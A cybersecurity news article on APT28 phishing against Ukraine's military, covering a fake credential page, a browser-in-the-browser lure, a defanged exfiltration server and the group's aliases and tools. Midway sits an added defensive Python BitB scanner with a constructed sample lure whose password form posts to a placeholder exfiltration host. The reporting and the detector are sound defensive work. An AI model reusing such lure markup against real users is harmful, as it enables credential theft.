30 January 2024

Russian hackers APT28 target Ukraine’s military with phishing attacks to steal credentials


Russian cyberespionage group APT28, affiliated with the Main Directorate of the General Staff of the Russian Armed Forces (GRU), has been conducting phishing attacks aimed at obtaining Ukrainian military personnel's credentials that would give it access to the country’s military situational awareness and command and control systems, Ukraine’s National Cyber Security Coordination Center (NCSCC) has warned.

The phishing campaign involves several attack vectors and is specifically targeting military personnel and units of the Ukrainian Defense Forces. In one instance, the attackers distributed a web page ostensibly containing military operational information regarding the Russian invasion. Once the page is opened, a field for entering credentials is presented to allegedly “confirm access”. The stolen credentials are then sent to an attacker-controlled server.

Another phishing tactic involves a document allegedly containing information on the activity of the ukr[.]net account. Upon clicking on the “Change password” button on the HTML page, a browser-in-the-browser (BitB) attack is launched to capture credentials.

The BitB attack is a phishing technique that simulates a login window with a spoofed domain within a parent browser window to steal credentials.

“In both cases, the credentials are exfiltrated to the actor-controlled server hxxp://202.55.80[.]225:35770, which is an Ubiquiti Edge router. The tactic of using pre-compromised Ubiquiti Edge routers to exfiltrate data has been observed by APT28 in previous phishing campaigns,” the NCSCC said.
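Both lures described above leave the same traces in their markup: a URL rendered as visible page text (the fake address bar of a BitB window) and a credential form whose action points somewhere other than the serving host. The following is an added example, not code from the NCSCC advisory, of a heuristic scanner an incident responder can run over captured phishing HTML; all hostnames in it are constructed placeholders.

```python
# Added example (not from the NCSCC advisory): a heuristic scanner for
# captured phishing HTML that flags browser-in-the-browser (BitB) pages
# and credential forms that submit off-site. Hosts below are constructed.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+")

class _Collector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.text_hosts = []      # hostnames rendered as visible text (fake address bars)
        self.form_actions = []    # where forms really submit
        self.has_password = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

    def handle_data(self, data):
        for m in URL_RE.finditer(data):
            host = urlparse(m.group(0)).hostname
            if host:
                self.text_hosts.append(host)

def scan_for_bitb(html, page_host):
    """Return a list of findings for HTML that was served from page_host."""
    c = _Collector()
    c.feed(html)
    findings = []
    # A real popup's URL lives in browser chrome, never in page text.
    spoofed = sorted({h for h in c.text_hosts if h != page_host})
    if c.has_password and spoofed:
        findings.append(f"fake address bar shows {spoofed} on a page served from {page_host}")
    for action in c.form_actions:
        host = urlparse(action).hostname
        if host and host != page_host:
            findings.append(f"credential form posts to third-party host {host}")
    return findings

# Constructed sample resembling the advisory's "Change password" lure.
SAMPLE_BITB = """<div class="fake-window"><div class="addr">https://accounts.example.net/login</div>
<form action="http://exfil.example.invalid:35770/collect" method="post">
<input name="user"><input type="password" name="pass"></form></div>"""
```

Run `scan_for_bitb(SAMPLE_BITB, "phish.example.org")` to see both findings; a genuine login page that posts to a relative path on its own host produces none.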

APT28 (aka APT-C-20, ATK5, Blue Athena, Fancy Bear, Frozenlake, Fighting Ursa, Forest Blizzard, G0007, Grey-Cloud, Grizzly Steppe, Group 74, Group-4127, Iron Twilight, ITG05, Pawn Storm, SIG40, Snakemackerel, Strontium, Sednit, Sofacy, Swallowtail, T-APT-12, TA422, TG-4127, Tsar Team, TsarTeam, and UAC-0028) is a Russian-backed threat actor group believed to have been active since 2007.

The threat actor is primarily focused on political and defense-oriented targets, including government, defense and aerospace contractors, energy utilities, media, research companies, journalists, and the information technology sector. Targeted regions include Ukraine, Europe (mostly NATO members), North America, the UAE, the Middle East, and Syria.

APT28 uses a wide variety of spear-phishing techniques involving malicious email and credential harvesting using fake websites embedded with malicious links. The group is also known to leverage zero-day exploits, custom malware (Zebrocy, Sofacy, X-Agent, Chopstick, Coreshell, Jhuhugit, Advstoreshell, Drovorub, Skinnyboy), watering hole attacks, and Living-off-the-Land tactics in its attack activity.

Last year, the group was observed compromising government institutions and military entities involved in aircraft infrastructure in Ukraine via security flaws in vulnerable RoundCube webmail servers. The threat actor had also targeted an energy infrastructure facility in Ukraine.

In related news, the Ukrainian Coordination Headquarters for the Treatment of Prisoners of War, the agency overseeing the treatment of prisoners of war, was hit by a distributed denial-of-service (DDoS) attack over the weekend. Access to its website has been restored, the agency said. It didn’t name the culprit behind the attack but linked the incident to the recent crash of the IL-76 plane in Belgorod Oblast (Russia), which Moscow claims was carrying 65 Ukrainian prisoners of war who were to be swapped. As of January 30, 2024, the Kremlin hadn’t provided any evidence to support the claims. Furthermore, it has rejected a request for an international commission to investigate the incident.

“Apparently, the enemy decided that the information, in particular, about the details of the exchange of prisoners of war and the downing of the IL-76 plane carries a threat for them,” the coordination center said.
